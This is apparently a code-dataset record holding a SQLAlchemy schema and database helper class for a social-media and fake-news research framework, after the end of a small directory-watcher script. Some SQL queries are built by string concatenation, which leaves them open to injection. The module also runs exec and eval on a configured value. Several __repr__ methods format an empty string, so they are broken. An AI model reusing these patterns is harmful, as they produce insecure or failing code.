directory.\")\nparser.add_argument('-s', action='store_true')\nargs = parser.parse_args()\nDIRECTORY_NAME = re.sub('[\\'\\\"]','',args.path)\nDIR_INFO = PATH_INFO_PROVIDER(DIRECTORY_NAME)\n\n\nif DIR_INFO.ISDIR() == True:\n if(args.s):\n print(\"Binding Server...\")\n Watcher(DIR_INFO.DIRNAME(), True).run()\n else:\n Watcher(DIR_INFO.DIRNAME(), False).run()\nelse:\n print('Defined directory', DIRECTORY_NAME, \"does not exist.\")","sub_path":"observe.py","file_name":"observe.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24271459","text":"# Created by aviade\n# Time: 31/03/2016 09:15\n\nimport logging\nimport os\nimport platform\n\nimport sqlalchemy\nfrom configuration.config_class import getConfig\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import aliased\nfrom sqlalchemy import event\nfrom sqlalchemy.sql.operators import ColumnOperators\nfrom sqlalchemy import Column, func, and_, or_, not_\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Boolean, Integer, Unicode, FLOAT\nfrom sqlalchemy.sql.schema import ForeignKey\nfrom sqlalchemy.sql.expression import *\nfrom sqlalchemy.sql import text\nfrom datetime import datetime, timedelta\nfrom commons.commons import *\nfrom commons.consts import DB_Insertion_Type, Author_Type, Author_Connection_Type\nimport re\nimport itertools\nfrom commons.consts import Domains, Social_Networks\nimport pandas as pd\nimport csv\nfrom collections import defaultdict\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy.orm import mapper\nfrom itertools import chain\n\nBase = declarative_base()\n\nconfigInst = getConfig()\n\ndialect_name = getConfig().get(\"DB\", 
\"dialect_name\")\n\nexec('import ' + dialect_name)\n\nexec('from ' + dialect_name + ' import DATETIME')\n\ndt = eval(dialect_name).DATETIME(\n storage_format=\"%(year)04d-%(month)02d-%(day)02d %(hour)02d:%(minute)02d:%(second)02d\",\n regexp=r\"(\\d{4})-(\\d{2})-(\\d{2}) (\\d{2}):(\\d{2}):(\\d{2})\",\n)\n\ndomain = getConfig().get(\"DEFAULT\", \"domain\")\n\n\nclass Author(Base):\n __tablename__ = 'authors'\n\n name = Column(Unicode, primary_key=True)\n domain = Column(Unicode, primary_key=True)\n author_guid = Column(Unicode, primary_key=True)\n\n author_screen_name = Column(Unicode, default=None)\n author_full_name = Column(Unicode, default=None)\n author_osn_id = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n created_at = Column(Unicode, default=None)\n statuses_count = Column(Integer, default=None)\n followers_count = Column(Integer, default=None)\n favourites_count = Column(Integer, default=None)\n friends_count = Column(Integer, default=None)\n listed_count = Column(Integer, default=None)\n language = Column(Unicode, default=None)\n profile_background_color = Column(Unicode, default=None)\n profile_background_tile = Column(Unicode, default=None)\n profile_banner_url = Column(Unicode, default=None)\n profile_image_url = Column(Unicode, default=None)\n profile_link_color = Column(Unicode, default=None)\n profile_sidebar_fill_color = Column(Unicode, default=None)\n profile_text_color = Column(Unicode, default=None)\n default_profile = Column(Unicode, default=None)\n contributors_enabled = Column(Unicode, default=None)\n default_profile_image = Column(Unicode, default=None)\n geo_enabled = Column(Unicode, default=None)\n protected = Column(Boolean, default=None)\n location = Column(Unicode, default=None)\n notifications = Column(Unicode, default=None)\n time_zone = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n utc_offset = Column(Unicode, default=None)\n verified = Column(Unicode, default=None)\n is_suspended_or_not_exists = Column(dt, default=None)\n\n # Tumblr fields\n default_post_format = Column(Unicode, default=None)\n likes_count = Column(Integer, default=None)\n allow_questions = Column(Boolean, default=False)\n allow_anonymous_questions = Column(Boolean, default=False)\n image_size = Column(Integer, default=None)\n\n media_path = Column(Unicode, default=None)\n\n author_type = Column(Unicode, default=None)\n bad_actors_collector_insertion_date = Column(Unicode, default=None)\n xml_importer_insertion_date = Column(Unicode, default=None)\n vico_dump_insertion_date = Column(Unicode, default=None)\n missing_data_complementor_insertion_date = Column(Unicode, default=None)\n bad_actors_markup_insertion_date = Column(Unicode, default=None)\n mark_missing_bad_actor_retweeters_insertion_date = Column(Unicode, default=None)\n author_sub_type = Column(Unicode, default=None)\n timeline_overlap_insertion_date = Column(Unicode, default=None)\n original_tweet_importer_insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.name, self.domain, self.author_guid, self.statuses_count)\n\n\nclass PostAuthorsConnections(Base):\n __tablename__ = 'post_authors_connections'\n post_id = Column(Unicode, primary_key=True)\n user_id = Column(Unicode, primary_key=True)\n\nclass AuthorConnection(Base):\n __tablename__ = 'author_connections'\n\n source_author_guid = Column(Unicode, primary_key=True)\n destination_author_guid = Column(Unicode, primary_key=True)\n connection_type = Column(Unicode, primary_key=True)\n 
weight = Column(FLOAT, default=0.0)\n insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (self.source_author_guid, self.destination_author_guid,\n self.connection_type, self.weight, self.insertion_date)\n\n\nclass TempAuthorConnection(Base):\n __tablename__ = 'temp_author_connections'\n\n source_author_osn_id = Column(Unicode, primary_key=True)\n destination_author_osn_id = Column(Unicode, primary_key=True)\n connection_type = Column(Unicode, primary_key=True)\n weight = Column(FLOAT, default=0.0)\n insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (self.source_author_osn_id, self.destination_author_osn_id,\n self.connection_type, self.weight, self.insertion_date)\n\n\nclass PostRetweeterConnection(Base):\n __tablename__ = 'post_retweeter_connections'\n\n post_osn_id = Column(Integer, primary_key=True)\n retweeter_twitter_id = Column(Integer, primary_key=True)\n connection_type = Column(Unicode, primary_key=True)\n insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_osn_id, self.retweeter_twitter_id, self.connection_type)\n\n\nclass PostUserMention(Base):\n __tablename__ = 'post_user_mentions'\n\n post_guid = Column(Integer, primary_key=True)\n user_mention_twitter_id = Column(Integer, primary_key=True)\n user_mention_screen_name = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_guid, self.user_mention_twitter_id, self.user_mention_screen_name)\n\n\nclass Post(Base):\n __tablename__ = 'posts'\n\n post_id = Column(Unicode, primary_key=True, index=True)\n author = Column(Unicode, default=None)\n guid = Column(Unicode, default=None)\n title = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n date = Column(dt, default=None)\n content = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n is_detailed = Column(Boolean, default=True)\n is_LB = Column(Boolean, default=False)\n is_valid = Column(Boolean, default=True)\n domain = Column(Unicode, primary_key=True, default=None)\n author_guid = Column(Unicode, default=None)\n\n media_path = Column(Unicode, default=None)\n\n # keywords = Column(Unicode, default=None)\n # paragraphs = Column(Unicode, default=None)\n post_osn_guid = Column(Unicode, default=None)\n post_type = Column(Unicode, default=None)\n post_format = Column(Unicode, default=None)\n reblog_key = Column(Unicode, default=None)\n tags = Column(Unicode, default=None)\n is_created_via_bookmarklet = Column(Boolean, default=None)\n is_created_via_mobile = Column(Boolean, default=None)\n source_url = Column(Unicode, default=None)\n source_title = Column(Unicode, default=None)\n is_liked = Column(Boolean, default=None)\n post_state = Column(Unicode, default=None)\n\n post_osn_id = Column(Integer, default=None)\n retweet_count = Column(Integer, default=None)\n favorite_count = Column(Integer, default=None)\n # reply_count = Column(Integer, default=None)\n # language = Column(Unicode, default=None)\n created_at = Column(Unicode, default=None)\n xml_importer_insertion_date = Column(Unicode, default=None)\n timeline_importer_insertion_date = Column(Unicode, default=None)\n original_tweet_importer_insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id, self.guid, self.title, self.url, self.date, self.content, self.author, self.is_detailed,\n self.is_LB, self.domain, self.author_guid)\n\n\nclass Post_citation(Base):\n __tablename__ = 
'post_citations'\n\n post_id_from = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n post_id_to = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n url_from = Column(Unicode, index=True) # need to be deleted do not use it\n url_to = Column(Unicode, index=True) # need to be deleted do not use it\n\n def __repr__(self):\n return \"<Post_citation(post_id_from='%s', post_id_to='%s', url_from='%s', url_to='%s')>\" % (\n self.post_id_from, self.post_id_to, self.url_from, self.url_to)\n\n\nclass Target_Article(Base):\n __tablename__ = 'target_articles'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n title = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n keywords = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<Target_Article(post_id='%s', author_guid='%s', title='%s', description='%s', keywords='%s')>\" % (\n self.post_id, self.author_guid, self.title, self.description, self.keywords)\n\n\n# could be a 'paragraph' or caption\nclass Target_Article_Item(Base):\n __tablename__ = 'target_article_items'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n type = Column(Unicode, default=None, primary_key=True)\n item_number = Column(Integer, default=None, primary_key=True)\n content = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<Target_Article_Item(post_id='%s', author_guid='%s', type='%s', item_number='%s', content='%s')>\" % (\n self.post_id, self.author_guid, self.type, self.item_number, self.content)\n\n\nclass Text_From_Image(Base):\n __tablename__ = 'image_hidden_texts'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n media_path = Column(Unicode, default=None)\n content = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<Text_From_Image(post_id='%s', author_guid='%s', media_path='%s', content='%s')>\" % (\n self.post_id, self.author_guid, self.media_path, self.content)\n\n\nclass Image_Tags(Base):\n __tablename__ = 'image_tags'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n media_path = Column(Unicode, default=None)\n tags = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<Image_Tags(post_id='%s', author_guid='%s', media_path='%s', tags='%s')>\" % (\n self.post_id, self.author_guid, self.media_path, self.tags)\n\n\nclass AuthorCitation(Base):\n __tablename__ = 'author_citations'\n # author_id_from = Column(Integer,ForeignKey(\"authors.author_id\",ondelete=\"CASCADE\"),primary_key=True)\n # author_id_from = Column(Integer,primary_key=True)\n from_author = Column(Unicode, primary_key=True)\n from_domain = Column(Unicode, primary_key=True)\n # author_id_to = Column(Integer,ForeignKey(\"authors.author_id\",ondelete=\"CASCADE\"),primary_key=True)\n # author_id_to = Column(Integer,primary_key=True)\n to_author = Column(Unicode, primary_key=True)\n to_domain = Column(Unicode, primary_key=True)\n window_start = Column(dt, primary_key=True)\n window_end = Column(dt, primary_key=True, default=None)\n number_of_citations = Column(Integer, default=None)\n from_author_guid = Column(Integer, ForeignKey(\"authors.author_guid\", ondelete=\"CASCADE\"))\n to_author_guid = Column(Integer, ForeignKey(\"authors.author_guid\", ondelete=\"CASCADE\"))\n\n def __repr__(self):\n return \"<AuthorCitation(window_start='%s', from_author='%s', from_domain='%s', to_author='%s', to_domain='%s', number_of_citations='%s', from_author_guid='%s', to_author_guid='%s')>\" % (\n self.window_start, self.from_author, 
self.from_domain, self.to_author, self.to_domain,\n self.number_of_citations,\n self.from_author_guid, self.to_author_guid)\n\n\nclass AuthorFeatures(Base):\n __tablename__ = 'author_features'\n author_guid = Column(Unicode, primary_key=True)\n window_start = Column(dt, primary_key=True)\n window_end = Column(dt, primary_key=True)\n attribute_name = Column(Unicode, primary_key=True)\n attribute_value = Column(Unicode)\n\n def __repr__(self):\n return \" \" % (\n self.author_guid, self.window_start, self.window_end, self.attribute_name, self.attribute_value)\n\n def __init__(self, _author_guid=None, _window_start=None, _window_end=None, _attribute_name=None,\n _attribute_value=None):\n self.author_guid = _author_guid\n self.window_start = _window_start\n self.window_end = _window_end\n self.attribute_name = _attribute_name\n self.attribute_value = _attribute_value\n\n\nclass Author_boost_stats(Base):\n __tablename__ = 'authors_boost_stats'\n\n window_start = Column(dt, default=None, primary_key=True)\n window_end = Column(dt, default=None)\n # author_id = Column(Integer,ForeignKey(\"authors.author_id\"),primary_key=True)\n # author_id = Column(Integer,default=None) #@todo: remove field. use name and domain. reinsert author_id appropriately.\n author_name = Column(Integer, default=None, primary_key=True)\n author_domain = Column(Integer, default=None, primary_key=True) # @todo: add domain values\n boosting_timeslots_participation_count = Column(Integer, default=None)\n count_of_authors_sharing_boosted_posts = Column(Integer, default=None)\n num_of_pointers = Column(Integer, default=None)\n num_of_pointed_posts = Column(Integer, default=None)\n pointers_scores = Column(Unicode, default=None)\n scores_sum = Column(FLOAT, default=None)\n scores_avg = Column(FLOAT, default=None)\n scores_std = Column(FLOAT, default=None)\n author_guid = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.window_start, self.window_end, self.boosting_timeslots_participation_count,\n self.count_of_authors_sharing_boosted_posts, self.num_of_pointers, self.num_of_pointed_posts,\n self.pointers_scores, self.scores_sum, self.scores_avg, self.scores_std, self.author_guid)\n\n\nclass Post_to_pointers_scores(Base):\n __tablename__ = 'posts_to_pointers_scores'\n post_id_to = Column(Integer, ForeignKey(\"post_citations.post_id_to\"), primary_key=True)\n window_start = Column(dt, primary_key=True)\n window_end = Column(dt, default=None)\n url_to = Column(Unicode, default=None)\n # author_id_from = Column(Integer,ForeignKey(\"authors.author_id\"),primary_key=True)\n # author_id_from = Column(Integer,default=None)#@todo: remove field. use name and domain. 
reinsert author_id appropriately.\n author_name = Column(Integer, default=None, primary_key=True)\n author_domain = Column(Integer, default=None, primary_key=True) # @todo: add domain values\n datetime = Column(Unicode, primary_key=True)\n pointer_score = Column(FLOAT, default=None)\n\n def __repr__(self):\n return \"<Post_to_pointers_scores(post_id_to='%s', window_start='%s', window_end='%s', url_to='%s', author_name='%s', author_domain='%s', datetime='%s', pointer_score='%s')>\" % (\n self.post_id_to, self.window_start, self.window_end, self.url_to, self.author_name, self.author_domain, self.datetime,\n self.pointer_score)\n\n\nclass Posts_representativeness(Base):\n __tablename__ = 'posts_representativeness'\n\n post_id = Column(Unicode, ForeignKey(\"posts.post_id\"), primary_key=True)\n topic_id = Column(Integer, primary_key=True)\n url = Column(Unicode, default=None)\n how_many_times_cited_in_topic = Column(Integer, default=None)\n in_how_many_topics = Column(Integer, default=None)\n post_count = Column(Integer, default=None)\n tfidf = Column(FLOAT, default=None)\n tof = Column(Integer, default=None)\n\n def __repr__(self):\n return \"<Posts_representativeness(post_id='%s', topic_id='%s', url='%s', how_many_times_cited_in_topic='%s', in_how_many_topics='%s', post_count='%s', tfidf='%s', tof='%s')>\" % \\\n (self.post_id, self.topic_id, self.url, self.how_many_times_cited_in_topic, self.in_how_many_topics,\n self.post_count, self.tfidf, self.tof)\n\n\nclass AnchorAuthor(Base):\n __tablename__ = 'anchor_authors'\n\n author_guid = Column(Unicode, ForeignKey(\"authors.author_guid\"), primary_key=True)\n author_type = Column(Unicode, default=None)\n\n def __init__(self, _author_guid, _author_type):\n self.author_guid = _author_guid\n self.author_type = _author_type\n\n def __repr__(self):\n return \"<AnchorAuthor(author_guid='%s', author_type='%s')>\" % \\\n (self.author_guid, self.author_type)\n\n\nclass RandomAuthorForGraph(Base):\n __tablename__ = 'random_authors_for_graphs'\n\n author_guid = Column(Unicode, ForeignKey(\"authors.author_guid\"), primary_key=True)\n author_type = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<RandomAuthorForGraph(author_guid='%s', author_type='%s')>\" % \\\n (self.author_guid, self.author_type)\n\n\nclass SinglePostByAuthor(Base):\n __tablename__ = 'single_post_by_author'\n\n post_id = Column(Unicode, primary_key=True)\n author_guid = Column(Unicode, primary_key=True)\n date = Column(dt)\n content = Column(Unicode)\n domain = Column(Unicode)\n\n def __repr__(self):\n return \"<SinglePostByAuthor(post_id='%s', author_guid='%s', date='%s', content='%s', domain='%s')>\" % \\\n (self.post_id, self.author_guid, self.date, self.content, self.domain)\n\n\nclass Struct:\n def __init__(self, **entries): self.__dict__.update(entries)\n\n\nclass Post_to_topic(Base):\n __tablename__ = \"posts_to_topic\"\n\n topic_id = Column(Integer, ForeignKey(\"topics.topic_id\"), primary_key=True)\n window_start = Column(dt, default=None, primary_key=True)\n window_end = Column(dt, default=None)\n post_id = Column(Integer, ForeignKey(\"posts.post_id\"), primary_key=True)\n guid = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<Post_to_topic(topic_id='%s', window_start='%s', window_end='%s', post_id='%s', guid='%s', url='%s')>\" % (\n self.topic_id, self.window_start, self.window_end, self.post_id, self.guid, self.url)\n\n\nclass PostTopicMapping(Base):\n __tablename__ = \"post_topic_mapping\"\n\n post_id = Column(Unicode, ForeignKey(\"posts.post_id\"), primary_key=True)\n max_topic_dist = Column(FLOAT, default=None)\n max_topic_id = Column(Integer, default=None)\n\n\nclass Term(Base):\n __tablename__ = \"terms\"\n\n term_id = Column(Integer, primary_key=True)\n description = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<Term(term_id='%s', description='%s')>\" % (\n self.term_id, self.description)\n\n\nclass Topic(Base):\n __tablename__ = \"topics\"\n\n topic_id = Column(Integer, primary_key=True)\n description = Column(Unicode, default=None)\n term_id = Column(Integer, ForeignKey(\"terms.term_id\"), primary_key=True)\n probability = Column(FLOAT, 
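# NOTE: per-term weight within a topic; with (topic_id, term_id) as the\n # composite key, each row stores one term's probability in one topic.\n 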
default=None)\n\n def __repr__(self):\n return \"\" % (\n self.topic_id, self.description, self.term_id, self.probability)\n\n\nclass Politifact_Liar_Dataset(Base):\n __tablename__ = \"politifact_liar_dataset\"\n\n post_guid = Column(Unicode, ForeignKey(\"posts.guid\"), primary_key=True)\n original_id = Column(Integer, default=None)\n statement = Column(Unicode, default=None)\n targeted_label = Column(Unicode, default=None)\n dataset_affiliation = Column(Unicode, default=None)\n subject = Column(Unicode, default=None)\n speaker = Column(Unicode, default=None)\n speaker_job_title = Column(Unicode, default=None)\n state_info = Column(Unicode, default=None)\n party_affiliation = Column(Unicode, default=None)\n barely_true_count = Column(Integer, default=None)\n false_count = Column(Integer, default=None)\n half_true_count = Column(Integer, default=None)\n mostly_true_count = Column(Integer, default=None)\n pants_on_fire_count = Column(Integer, default=None)\n context = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_guid, self.original_id, self.statement, self.targeted_label)\n\n\nclass Claim_Tweet_Connection(Base):\n __tablename__ = \"claim_tweet_connection\"\n\n claim_id = Column(Unicode, primary_key=True) # PolitiFact post\n post_id = Column(Unicode, primary_key=True) # crawled tweet by\n\n\nclass Claim(Base):\n __tablename__ = \"claims\"\n\n claim_id = Column(Unicode, primary_key=True, index=True)\n title = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n verdict_date = Column(dt, default=None)\n keywords = Column(Unicode, default=None)\n domain = Column(Unicode, default=None)\n verdict = Column(Unicode, default=None)\n category = Column(Unicode, default=None)\n sub_category = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.claim_id, self.title, self.description, self.url, self.verdict_date, self.keywords, self.domain,\n self.verdict)\n\n\nclass Claim_Keywords_Connections(Base):\n __tablename__ = \"claim_keywords_connections\"\n claim_id = Column(Unicode, primary_key=True, index=True)\n type = Column(Unicode, primary_key=True, index=True)\n keywords = Column(Unicode, default=None)\n score = Column(FLOAT, default=None)\n tweet_count = Column(Integer, default=None)\n\n\nclass RedditPostCommentConnection(Base):\n __tablename__ = \"reddit_post_comment_connection\"\n post_id = Column(Unicode, primary_key=True, index=True)\n comment_id = Column(Unicode, primary_key=True, index=True)\n\n\nclass RedditPost(Base):\n __tablename__ = 'reddit_posts'\n post_id = Column(Unicode, primary_key=True, index=True)\n guid = Column(Unicode, default=None)\n link_in_body = Column(Unicode, default=None)\n ups = Column(Integer, default=0)\n downs = Column(Integer, default=0)\n score = Column(Integer, default=0)\n upvote_ratio = Column(Integer, default=0)\n number_of_comments = Column(Integer, default=None)\n parent_id = Column(Unicode, default=None)\n stickied = Column(Boolean, default=False)\n is_submitter = Column(Boolean, default=False)\n distinguished = Column(Unicode, default=None)\n\n\nclass RedditAuthor(Base):\n __tablename__ = 'reddit_authors'\n\n name = Column(Unicode, primary_key=True)\n author_guid = Column(Unicode, primary_key=True)\n comments_count = Column(Integer, default=0)\n comment_karma = Column(Integer, default=0)\n link_karma = Column(Integer, default=0)\n is_gold = Column(Boolean, default=False)\n is_moderator = Column(Boolean, default=False)\n is_employee = 
Column(Boolean, default=False)\n\n\nclass InstagramPost(Base):\n __tablename__ = 'instagram_posts'\n id = Column(Unicode, primary_key=True)\n display_url = Column(Unicode, default=None)\n comments_disabled = Column(Boolean, default=None)\n likes = Column(Integer, default=None)\n # body = Column(Unicode, default=None)\n comment_count = Column(Integer, default=None)\n is_video = Column(Boolean, default=None)\n # owner_id = Column(Unicode, default=None)\n shortcode = Column(Unicode, default=None)\n # taken_at_timestamp = Column(Integer, default=None)\n thumbnail_resources = Column(Unicode, default=None)\n media_preview = Column(Unicode, default=None)\n gating_info = Column(Unicode, default=None)\n dimensions = Column(Unicode, default=None)\n instagram_typename = Column(Unicode, default=None)\n hashtag = Column(Unicode, default=None)\n\n\nclass InstagramAuthor(Base):\n __tablename__ = 'instagram_authors'\n id = Column(Unicode, primary_key=True)\n # username = Column(Unicode, default=None)\n # full_name = Column(Unicode, default=None)\n # biography = Column(Unicode, default=None)\n followers_count = Column(Integer, default=None)\n following_count = Column(Integer, default=None)\n posts_count = Column(Integer, default=None)\n is_business_account = Column(Boolean, default=None)\n is_joined_recently = Column(Boolean, default=None)\n is_private = Column(Boolean, default=None)\n # profile_pic_url = Column(Unicode, default=None)\n\n\nclass GooglePostKeywords(Base):\n __tablename__ = 'google_post_keywords'\n\n post_id = Column(Integer, primary_key=True)\n keywords = Column(Unicode, primary_key=True)\n insertion_date = Column(Unicode, default=None)\n\n\nclass NewsArticle(Base):\n __tablename__ = 'news_articles'\n\n article_id = Column(Unicode, ForeignKey('claims.claim_id', ondelete=\"CASCADE\"), primary_key=True)\n author = Column(Unicode, default=None)\n published_date = Column(dt, default=None)\n domain = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n title = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n content = Column(Unicode, default=None)\n url_to_image = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<NewsArticle(article_id='%s', author='%s', published_date='%s', url='%s', title='%s', description='%s')>\" % (\n self.article_id, self.author, self.published_date, self.url, self.title, self.description)\n\n\nclass News_Article_Item(Base):\n __tablename__ = 'news_article_items'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n source_newsapi_internal_id = Column(Unicode, default=None)\n source_newsapi_internal_name = Column(Unicode, default=None)\n content = Column(Unicode, default=None)\n img_url = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"<News_Article_Item(post_id='%s', author_guid='%s', source_newsapi_internal_id='%s', source_newsapi_internal_name='%s', content='%s', img_url='%s')>\" % (\n self.post_id, self.author_guid, self.source_newsapi_internal_id, self.source_newsapi_internal_name,\n self.content, self.img_url)\n\n\nclass DB():\n '''\n Represents the primary blackboard of the system.\n The module must be the first one to setUp.\n '''\n\n def __init__(self):\n pass\n\n def setUp(self):\n configInst = getConfig()\n self._date = getConfig().eval(self.__class__.__name__, \"start_date\")\n self._pathToEngine = configInst.get(self.__class__.__name__, \"DB_path\") + \\\n configInst.get(self.__class__.__name__, \"DB_name_prefix\") + \\\n configInst.get(\"DEFAULT\", \"social_network_name\") + \\\n configInst.get(self.__class__.__name__, \"DB_name_suffix\")\n\n 
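# NOTE: the analysis window computed below spans\n # [window_start, window_start + window_size). Illustrative values (assumed,\n # not taken from a real config): start_date = date('2010-01-01 00:00:00')\n # with window_analyze_size_in_sec = 86400 yields a one-day window.\n 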
start_date = configInst.get(\"DEFAULT\", \"start_date\").strip(\"date('')\")\n self._window_start = datetime.datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')\n self._window_size = datetime.timedelta(\n seconds=int(configInst.get(\"DEFAULT\", \"window_analyze_size_in_sec\")))\n self._window_end = self._window_start + self._window_size\n\n if configInst.eval(self.__class__.__name__, \"remove_on_setup\"):\n self.deleteDB()\n\n self.engine = create_engine(\"sqlite:///\" + self._pathToEngine, echo=False)\n self.Session = sessionmaker()\n self.Session.configure(bind=self.engine)\n\n self.session = self.Session()\n\n self.posts = \"posts\"\n self.authors = \"authors\"\n self.author_features = \"author_features\"\n\n @event.listens_for(self.engine, \"connect\")\n def connect(dbapi_connection, connection_rec):\n dbapi_connection.enable_load_extension(True)\n if (getConfig().eval(\"OperatingSystem\", \"windows\")):\n full_path = os.path.abspath(\"%s%s\") % (configInst.get(\"DB\", \"DB_path_to_extension\"), '.dll')\n dbapi_connection.execute('SELECT load_extension(\"{}\")'.format(full_path).replace('\\\\', '/'))\n if (getConfig().eval(\"OperatingSystem\", \"linux\")):\n dbapi_connection.execute(\n 'SELECT load_extension(\"%s%s\")' % (configInst.get(\"DB\", \"DB_path_to_extension\"), '.so'))\n if (getConfig().eval(\"OperatingSystem\", \"mac\")):\n dbapi_connection.execute(\n 'SELECT load_extension(\"%s%s\")' % (configInst.get(\"DB\", \"DB_path_to_extension\"), '.dylib'))\n\n dbapi_connection.enable_load_extension(False)\n\n if getConfig().eval(self.__class__.__name__, \"dropall_on_setup\"):\n Base.metadata.drop_all(self.engine)\n\n Base.metadata.create_all(self.engine)\n pass\n\n def tearDown(self):\n if getConfig().eval(self.__class__.__name__, \"dropall_on_teardown\"):\n if (os.path.exists(self._pathToEngine)):\n Base.metadata.drop_all(self.engine)\n\n if getConfig().eval(self.__class__.__name__, \"remove_on_teardown\"):\n self.deleteDB()\n\n if getConfig().eval(self.__class__.__name__, \"vacuum_db\"):\n self.vacuum_db()\n\n def vacuum_db(self):\n query = text(\"VACUUM;\")\n self.session.execute(query)\n\n def execute(self, window_start):\n pass\n\n def cleanUp(self, window_start):\n pass\n\n def canProceedNext(self, window_start):\n return True\n\n def is_well_defined(self):\n return True\n\n ##########################################################\n # miscellaneous\n def deleteDB(self):\n if (os.path.exists(self._pathToEngine)):\n try:\n os.remove(self._pathToEngine)\n except:\n logging.exception(\"Data Base %s remove failed\" % self._pathToEngine)\n\n def commit(self):\n self.session.commit()\n\n def is_post_topic_mapping_table_exist(self):\n query = text(\"SELECT name FROM sqlite_master WHERE type='table' AND name='post_topic_mapping'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) != 0\n\n def is_topics_table_exist(self):\n query = text(\"SELECT name FROM sqlite_master WHERE type='table' AND name='topics'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) != 0\n\n def is_table_exist(self, table_name):\n q = \"SELECT name FROM sqlite_master WHERE type='table' AND name=\" + \"\\'\" + table_name + \"\\'\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) != 0\n\n def get_key_posts(self):\n query = text(\"SELECT post_id FROM export_key_posts\")\n result = 
self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return [rec[0] for rec in records]\n\n def delete_post_representativeness_data(self):\n query = text(\"DELETE FROM posts_representativeness;\")\n self.session.execute(query)\n\n def get_retweets_with_no_tweet_citation(self):\n '''\n :return: a list of post_ids and urls of retweets whose connection doesn't contain any reference to twitter\n '''\n query = text(\"select posts.post_id as post_id_from, posts.url as url_from \" \\\n \"from posts \" \\\n \"where posts.content like \\'%RT @%\\' \" \\\n \"Except \"\n \"select post_citations.post_id_from, post_citations.url_from from post_citations where post_citations.url_to like \\'%twitter.com%\\'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return {rec[0]: rec[1] for rec in records}\n\n def is_post_citation_exist(self, post_id_from, post_id_to):\n query = text(\n \"select * from post_citations where post_citations.post_id_from = :post_id_from and post_citations.post_id_to = :post_id_to\")\n result = self.session.execute(query, params=dict(post_id_from=post_id_from, post_id_to=post_id_to))\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) > 0\n\n def get_topic_to_author_mapping(self, target_author_field):\n '''\n :return: a mapping of -> -> for each topic\n '''\n ans = {}\n query = text(\"\"\"select max_topic_id, authors.{0}, count(*) as posts_in_topic_count \n from post_topic_mapping , posts , authors \n where post_topic_mapping.post_id = posts.post_id \n and authors.author_guid = posts.author_guid \n group by max_topic_id, author \n order by max_topic_id\"\"\".format(target_author_field))\n result = self.session.execute(query)\n for topic_id, author, posts_in_topic_count in result:\n if not topic_id in ans:\n ans[topic_id] = {}\n ans[topic_id][author] = posts_in_topic_count\n return ans\n\n def get_topics(self):\n query = text(\"select * from topics\")\n result = self.session.execute(query)\n return [r for r in result]\n\n def update_json_post_retweeter(self, id, key, value):\n update_query = \"UPDATE \" + self.post_retweeter_table + \" SET \" + key + \"=\" + str(\n value) + \" WHERE retweeter_id=\" + str(id)\n self.update_query(update_query)\n\n def update_query(self, query):\n self.session.execute(query)\n 